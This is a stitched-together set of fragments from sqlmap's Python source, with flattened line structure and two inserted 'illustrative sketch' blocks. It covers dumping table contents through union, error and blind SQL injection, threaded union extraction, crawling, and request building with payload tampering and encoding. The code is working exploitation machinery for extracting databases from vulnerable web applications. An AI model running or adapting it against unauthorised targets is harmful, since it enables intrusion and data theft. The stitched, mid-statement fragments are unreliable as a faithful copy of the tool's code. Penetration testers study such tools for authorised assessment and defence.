re.I) is not None: infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming( tbl) singleTimeLogMessage(infoMsg) continue conf.tbl = tbl kb.data.dumpedTable = {} if foundData is None: kb.data.cachedColumns = {} self.getColumns(onlyColNames=True, dumpMode=True) else: kb.data.cachedColumns = foundData try: if Backend.isDbms(DBMS.INFORMIX): kb.dumpTable = "%s:%s" % (conf.db, tbl) else: kb.dumpTable = "%s.%s" % (conf.db, tbl) if safeSQLIdentificatorNaming( conf.db ) not in kb.data.cachedColumns or safeSQLIdentificatorNaming( tbl, True ) not in kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db )] or not kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)][safeSQLIdentificatorNaming(tbl, True)]: warnMsg = "unable to enumerate the columns for table " warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming( tbl) warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db) warnMsg += ", skipping" if len(tblList) > 1 else "" logger.warn(warnMsg) continue columns = kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)][safeSQLIdentificatorNaming(tbl, True)] colList = sorted(column for column in columns if column) if conf.exclude: colList = [ _ for _ in colList if re.search(conf.exclude, _, re.I) is None ] if not colList: warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming( tbl) warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) warnMsg += " (no usable column names)" logger.warn(warnMsg) continue kb.dumpColumns = [ unsafeSQLIdentificatorNaming(_) for _ in colList ] colNames = colString = ", ".join(column for column in colList) rootQuery = queries[Backend.getIdentifiedDbms()].dump_table infoMsg = "fetching entries" if conf.col: infoMsg += " of column(s) '%s'" % colNames infoMsg += " for table '%s'" % unsafeSQLIdentificatorNaming( tbl) infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) for column in colList: _ = agent.preprocessField(tbl, column) if _ != column: colString = re.sub(r"\b%s\b" % re.escape(column), _, colString) entriesCount = 0 
if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: entries = [] query = None if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL): query = rootQuery.inband.query % ( colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.MCKOI, DBMS.EXTREMEDB): query = rootQuery.inband.query % (colString, tbl) elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): # Partial inband and error if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION]. where == PAYLOAD.WHERE.ORIGINAL): table = "%s.%s" % (conf.db, tbl) if Backend.isDbms( DBMS.MSSQL) and not conf.forcePivoting: warnMsg = "in case of table dumping problems (e.g. column entry order) " warnMsg += "you are advised to rerun with '--force-pivoting'" singleTimeWarnMessage(warnMsg) query = rootQuery.blind.count % table query = agent.whereQuery(query) count = inject.getValue( query, blind=False, time=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if isNumPosStrValue(count): try: indexRange = getLimitRange( count, plusOne=True) for index in indexRange: row = [] for column in colList: query = rootQuery.blind.query3 % ( column, column, table, index) query = agent.whereQuery(query) value = inject.getValue( query, blind=False, time=False, dump=True) or "" row.append(value) if not entries and isNoneValue( row): break entries.append(row) except KeyboardInterrupt: kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) if isNoneValue( entries) and not kb.dumpKeyboardInterrupt: try: retVal = pivotDumpTable(table, colList, blind=False) except KeyboardInterrupt: retVal = None kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) if retVal: entries, _ = retVal entries = BigArray( _zip(*[ entries[colName] for colName in colList ])) else: query = rootQuery.inband.query % (colString, conf.db, tbl) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE): query = rootQuery.inband.query % ( colString, conf.db, tbl, prioritySortColumns(colList)[0]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) query = agent.whereQuery(query) if not entries and query and not kb.dumpKeyboardInterrupt: try: entries = inject.getValue(query, blind=False, time=False, dump=True) except KeyboardInterrupt: entries = None kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) if not isNoneValue(entries): if isinstance(entries, six.string_types): entries = [entries] elif not isListLike(entries): entries = [] entriesCount = len(entries) for index, column in enumerate(colList): if column not in kb.data.dumpedTable: kb.data.dumpedTable[column] = { "length": len(column), "values": BigArray() } for entry in entries: if entry is None or len(entry) == 0: continue if isinstance(entry, six.string_types): colEntry = entry else: colEntry = unArrayizeValue( entry[index] ) if index < len(entry) else u'' maxLen = max( getConsoleLength(column), getConsoleLength( DUMP_REPLACEMENTS.get( getUnicode(colEntry), getUnicode(colEntry)))) if maxLen > kb.data.dumpedTable[column][ "length"]: kb.data.dumpedTable[column][ 
"length"] = maxLen kb.data.dumpedTable[column]["values"].append( colEntry) if not kb.data.dumpedTable and isInferenceAvailable( ) and not conf.direct: infoMsg = "fetching number of " if conf.col: infoMsg += "column(s) '%s' " % colNames infoMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming( tbl) infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL): query = rootQuery.blind.count % ( tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB): query = rootQuery.blind.count % tbl elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) elif Backend.isDbms(DBMS.MAXDB): query = rootQuery.blind.count % tbl elif Backend.isDbms(DBMS.INFORMIX): query = rootQuery.blind.count % (conf.db, tbl) else: query = rootQuery.blind.count % (conf.db, tbl) query = agent.whereQuery(query) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) lengths = {} entries = {} if count == 0: warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming( tbl) warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming( conf.db) warnMsg += "appears to be empty" logger.warn(warnMsg) for column in colList: lengths[column] = len(column) entries[column] = [] elif not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of " if conf.col: warnMsg += "column(s) '%s' " % colNames warnMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming( tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.warn(warnMsg) continue elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL, DBMS.INFORMIX, DBMS.MCKOI): if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB): table = tbl elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL, DBMS.MAXDB): table = "%s.%s" % (conf.db, tbl) elif Backend.isDbms(DBMS.INFORMIX): table = "%s:%s" % (conf.db, tbl) if Backend.isDbms( DBMS.MSSQL) and not conf.forcePivoting: warnMsg = "in case of table dumping problems (e.g. 
column entry order) " warnMsg += "you are advised to rerun with '--force-pivoting'" singleTimeWarnMessage(warnMsg) try: indexRange = getLimitRange(count, plusOne=True) for index in indexRange: for column in colList: query = rootQuery.blind.query3 % ( column, column, table, index) query = agent.whereQuery(query) value = inject.getValue( query, union=False, error=False, dump=True) or "" if column not in lengths: lengths[column] = 0 if column not in entries: entries[column] = BigArray() lengths[column] = max( lengths[column], len( DUMP_REPLACEMENTS.get( getUnicode(value), getUnicode(value)))) entries[column].append(value) except KeyboardInterrupt: kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) if not entries and not kb.dumpKeyboardInterrupt: try: retVal = pivotDumpTable(table, colList, count, blind=True) except KeyboardInterrupt: retVal = None kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) if retVal: entries, lengths = retVal else: emptyColumns = [] plusOne = Backend.getIdentifiedDbms( ) in PLUS_ONE_DBMSES indexRange = getLimitRange(count, plusOne=plusOne) if len(colList) < len( indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: debugMsg = "checking for empty columns" logger.debug(infoMsg) for column in colList: if not inject.checkBooleanExpression( "(SELECT COUNT(%s) FROM %s)>0" % (column, kb.dumpTable)): emptyColumns.append(column) debugMsg = "column '%s' of table '%s' will not be " % ( column, kb.dumpTable) debugMsg += "dumped as it appears to be empty" logger.debug(debugMsg) try: for index in indexRange: for column in colList: value = "" if column not in lengths: lengths[column] = 0 if column not in entries: entries[column] = BigArray() if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE): query = rootQuery.blind.query % ( agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) elif Backend.getIdentifiedDbms() in ( DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, ): query = rootQuery.blind.query % ( agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index) elif Backend.getIdentifiedDbms() in ( DBMS.MIMERSQL, ): query = rootQuery.blind.query % ( agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), sorted(colList, key=len)[0], index) elif Backend.getIdentifiedDbms() in ( DBMS.SQLITE, DBMS.EXTREMEDB): query = rootQuery.blind.query % ( agent.preprocessField( tbl, column), tbl, index) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % ( index, agent.preprocessField(tbl, column), tbl) elif Backend.isDbms(DBMS.INFORMIX): query = rootQuery.blind.query % ( index, agent.preprocessField( tbl, column), conf.db, tbl, sorted(colList, key=len)[0]) elif Backend.isDbms(DBMS.FRONTBASE): query = rootQuery.blind.query % ( index, agent.preprocessField( tbl, column), conf.db, tbl) else: query = rootQuery.blind.query % ( agent.preprocessField(tbl, column), conf.db, tbl, index) query = agent.whereQuery(query) value = NULL if column in emptyColumns else inject.getValue( query, union=False, error=False, dump=True) value = '' if value is None else value lengths[column] = max( lengths[column], len( DUMP_REPLACEMENTS.get( getUnicode(value), getUnicode(value)))) entries[column].append(value) except KeyboardInterrupt: 
kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) for column, columnEntries in entries.items(): length = max(lengths[column], len(column)) kb.data.dumpedTable[column] = { "length": length, "values": columnEntries } entriesCount = len(columnEntries) if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag): warnMsg = "unable to retrieve the entries " if conf.col: warnMsg += "of columns '%s' " % colNames warnMsg += "for table '%s' " % unsafeSQLIdentificatorNaming( tbl) warnMsg += "in database '%s'%s" % ( unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "") logger.warn(warnMsg) else: kb.data.dumpedTable["__infos__"] = { "count": entriesCount, "table": safeSQLIdentificatorNaming(tbl, True), "db": safeSQLIdentificatorNaming(conf.db) } try: attackDumpedTable() except (IOError, OSError) as ex: errMsg = "an error occurred while attacking " errMsg += "table dump ('%s')" % getSafeExString(ex) logger.critical(errMsg) conf.dumper.dbTableValues(kb.data.dumpedTable) except SqlmapConnectionException as ex: errMsg = "connection exception detected in dumping phase " errMsg += "('%s')" % getSafeExString(ex) logger.critical(errMsg) finally: kb.dumpColumns = None kb.dumpTable = None
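# --- Illustrative sketch (not sqlmap code): the shape of kb.data.dumpedTable built above. Each
# column keeps its widest rendered value (used later for table drawing) plus the list of
# retrieved entries, and a "__infos__" record carries the metadata handed to the dumper.
def build_dumped_table(db, table, columns, rows):
    dumped = {}
    for column in columns:
        dumped[column] = {"length": len(column), "values": []}
    for row in rows:
        for index, column in enumerate(columns):
            value = "" if row[index] is None else str(row[index])
            dumped[column]["length"] = max(dumped[column]["length"], len(value))
            dumped[column]["values"].append(value)
    dumped["__infos__"] = {"count": len(rows), "table": table, "db": db}
    return dumped

print(build_dumped_table("shop", "users", ["id", "username"], [(1, "admin"), (2, "jsmith")]))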
def unionUse(expression, unpack=True, dump=False): """ This function tests for an inband SQL injection on the target url then call its subsidiary function to effectively perform an inband SQL injection on the affected url """ initTechnique(PAYLOAD.TECHNIQUE.UNION) abortedFlag = False count = None origExpr = expression startLimit = 0 stopLimit = None value = None width = getConsoleWidth() start = time.time() _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) if expressionFieldsList and len(expressionFieldsList) > 1 and " ORDER BY " in expression.upper(): # No need for it in multicolumn dumps (one row is retrieved per request) and just slowing down on large table dumps expression = expression[:expression.upper().rindex(" ORDER BY ")] # We have to check if the SQL query might return multiple entries # and in such case forge the SQL limiting the query output one # entry per time # NOTE: I assume that only queries that get data from a table can # return multiple entries if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ (dump and (conf.limitStart or conf.limitStop))) and \ " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ and not re.search(SQL_SCALAR_REGEX, expression, re.I): limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I) topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I) if limitRegExp or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query if limitGroupStart.isdigit(): startLimit = int(limitRegExp.group(int(limitGroupStart))) stopLimit = limitRegExp.group(int(limitGroupStop)) limitCond = int(stopLimit) > 1 elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): if limitRegExp: limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query if limitGroupStart.isdigit(): startLimit = int(limitRegExp.group(int(limitGroupStart))) stopLimit = limitRegExp.group(int(limitGroupStop)) limitCond = int(stopLimit) > 1 elif topLimit: startLimit = 0 stopLimit = int(topLimit.group(1)) limitCond = int(stopLimit) > 1 elif Backend.isDbms(DBMS.ORACLE): limitCond = False else: limitCond = True # I assume that only queries NOT containing a "LIMIT #, 1" # (or similar depending on the back-end DBMS) can return # multiple entries if limitCond: if limitRegExp: stopLimit = int(stopLimit) # From now on we need only the expression until the " LIMIT " # (or similar, depending on the back-end DBMS) word if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): stopLimit += startLimit untilLimitChar = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query) expression = expression[:untilLimitChar] elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): stopLimit += startLimit elif dump: if conf.limitStart: startLimit = conf.limitStart - 1 if conf.limitStop: stopLimit = conf.limitStop # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % '*', 1) if " ORDER BY " in 
countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] output = __oneShotUnionUse(countedExpression, unpack) count = parseUnionPage(output) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) infoMsg = "the SQL query used returns " infoMsg += "%d entries" % stopLimit logger.info(infoMsg) elif count and (not isinstance(count, basestring) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif not count or int(count) == 0: if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value threadData = getCurrentThreadData() threadData.shared.limits = iter(xrange(startLimit, stopLimit)) numThreads = min(conf.threads, (stopLimit - startLimit)) threadData.shared.value = BigArray() if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. It might take too long" logger.debug(debugMsg) try: def unionThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limits: try: num = threadData.shared.limits.next() except StopIteration: break if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): field = expressionFieldsList[0] elif Backend.isDbms(DBMS.ORACLE): field = expressionFieldsList else: field = None limitedExpr = agent.limitQuery(num, expression, field) output = __oneShotUnionUse(limitedExpr, unpack, True) if not kb.threadContinue: break if output: if all(map(lambda x: x in output, [kb.chars.start, kb.chars.stop])): items = parseUnionPage(output) if isNoneValue(items): continue with kb.locks.value: for item in arrayizeValue(items): threadData.shared.value.append(item) else: items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo): status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))))) if len(status) > width: status = "%s..." % status[:width - 3] dataToStdout("%s\r\n" % status, True) runThreads(numThreads, unionThread) if conf.verbose == 1: clearConsoleLine(True) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full inband doesn't play well with ORDER BY value = __oneShotUnionUse(expression, unpack) duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d queries in %d seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) logger.debug(debugMsg) return value
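# --- Illustrative sketch (not sqlmap code): the start/stop limit extraction that the partial
# UNION branch above performs. The regular expressions here are simplified stand-ins for the
# per-DBMS limitregexp queries; they only cover "LIMIT x, y" (MySQL-style) and "TOP n" (MSSQL).
import re

def parse_limits(expression):
    start, stop = 0, None
    match = re.search(r"\bLIMIT\s+(\d+)\s*,\s*(\d+)", expression, re.I)
    if match:
        start = int(match.group(1))
        stop = start + int(match.group(2))        # MySQL LIMIT offset, count
        return start, stop
    match = re.search(r"\bTOP\s+(\d+)\b", expression, re.I)
    if match:
        stop = int(match.group(1))
    return start, stop

print(parse_limits("SELECT name FROM users LIMIT 10, 5"))   # (10, 15)
print(parse_limits("SELECT TOP 3 name FROM users"))          # (0, 3)
print(parse_limits("SELECT name FROM users"))                # (0, None)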
get += "%s%s=%s" % (delimiter, name, value) elif cookie is not None: cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value) if not conf.skipUrlEncode: get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif kb.postUrlEncode: post = urlencode(post, spaceplus=kb.postSpaceToPlus) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "[%s] [WARNING] time-based comparison requires " % time.strftime("%X") warnMsg += "larger statistical model, please wait" dataToStdout(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) dataToStdout('.') dataToStdout("\n")
dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) threadData.shared.deeper = set() threadData.shared.unprocessed = set([conf.url]) logger.info("starting crawler") for i in xrange(conf.crawlDepth): if i > 0 and conf.threads == 1: singleTimeWarnMessage("running in a single-thread mode. This could take a while.") threadData.shared.count = 0 threadData.shared.length = len(threadData.shared.unprocessed) numThreads = min(conf.threads, len(threadData.shared.unprocessed)) logger.info("searching for links with depth %d" % (i + 1)) runThreads(numThreads, crawlThread) clearConsoleLine(True) if threadData.shared.deeper: threadData.shared.unprocessed = set(threadData.shared.deeper) else: break except KeyboardInterrupt: warnMsg = "user aborted during crawling. sqlmap " warnMsg += "will use partial list" logger.warn(warnMsg) finally: clearConsoleLine(True) if not threadData.shared.outputs: warnMsg = "no usable links found (with GET parameters)"
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload, auxHeaders = function(payload=payload, headers=auxHeaders) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place in (PLACE.GET, PLACE.POST, PLACE.URI, PLACE.CUSTOM_POST): # payloads in GET and/or POST need to be urlencoded # throughly without safe chars (especially & and =) # addendum: as we support url encoding in tampering # functions therefore we need to use % as a safe char if place != PLACE.URI or ( value and payload and '?' in value and value.find('?') < value.find(payload)): payload = urlencode( payload, '%', False, True ) if not place in (PLACE.POST, PLACE.CUSTOM_POST ) and conf.skipUrlEncode else payload value = agent.replacePayload(value, payload) elif place == PLACE.SOAP: # payloads in SOAP should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', ">").replace('<', "<") value = agent.replacePayload(value, payload) if place: value = agent.removePayloadDelimiters(value) if place == PLACE.COOKIE and conf.cookieUrlencode: value = urlEncodeCookieValues(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = conf.parameters[ PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[ PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace( CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value if PLACE.SOAP in conf.parameters: post = conf.parameters[ PLACE.SOAP] if place != PLACE.SOAP or not value else value if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[ PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.USER_AGENT in conf.parameters: ua = conf.parameters[ PLACE. USER_AGENT] if place != PLACE.USER_AGENT or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[ PLACE. 
REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[ PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub( "%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter( cookie, randomParameter) if conf.evalCode: delimiter = conf.pDel or "&" variables = {} originals = {} for item in filter(None, (get, post)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) evaluateCode("%s='%s'" % (name, value), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): value = unicode(value) if '%s=' % name in (get or ""): get = re.sub( "((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get) elif '%s=' % name in (post or ""): post = re.sub( "((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post) elif post: post += "%s%s=%s" % (delimiter, name, value) else: get += "%s%s=%s" % (delimiter, name, value) get = urlencode(get, limit=True) if post: if conf.skipUrlEncode is None: _ = (post or "").strip() if _.startswith("<") and _.endswith(">"): msg = "provided POST data looks " msg += "like it's in XML format. " msg += "Do you want to turn off URL encoding " msg += "which is usually causing problems " msg += "in this kind of situations? [Y/n]" conf.skipUrlEncode = readInput(msg, default="Y").upper() != "N" if place not in (PLACE.POST, PLACE.SOAP, PLACE.CUSTOM_POST) and hasattr( post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif not conf.skipUrlEncode and place not in (PLACE.SOAP, ): post = urlencode(post) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." singleTimeWarnMessage(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = False warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. 
" warnMsg += "%d or more)" % (conf.timeSec * 2) logger.critical(warnMsg) elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter's " warnMsg += "bandwidth during usage of time-based queries" singleTimeWarnMessage(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if headers: if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int( headers[HTTPHEADER.CONTENT_RANGE] [headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) if conf.secondOrder: page, headers, code = Connect.getPage( url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(r"max.+connections", page or "", re.I) is not None kb.permissionFlag = re.search( r"(command|permission|access)\s*(was|is)?\s*denied", page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison( page, headers, code, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, headers, code, getRatioValue, pageLength) else: return False
